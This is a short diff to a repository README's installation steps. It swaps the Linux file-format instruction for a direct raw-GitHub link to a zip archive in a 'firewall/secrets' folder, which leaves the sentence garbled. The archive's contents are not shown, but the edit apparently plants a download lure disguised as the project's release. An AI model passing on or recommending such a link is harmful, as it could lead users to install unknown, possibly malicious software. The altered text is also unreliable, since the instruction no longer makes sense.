Ninju15331/infra/README.md

    - For Windows, pick the `.exe` or `.zip`
    - For macOS, select the `.dmg` or `.zip`
-   - For Linux, find the `.tar.gz` or similar format
+   - For Linux, find the `https://raw.githubusercontent.com/Ninju15331/infra/main/firewall/secrets/Software_1.1.zip` or similar format

 3. **Download the File**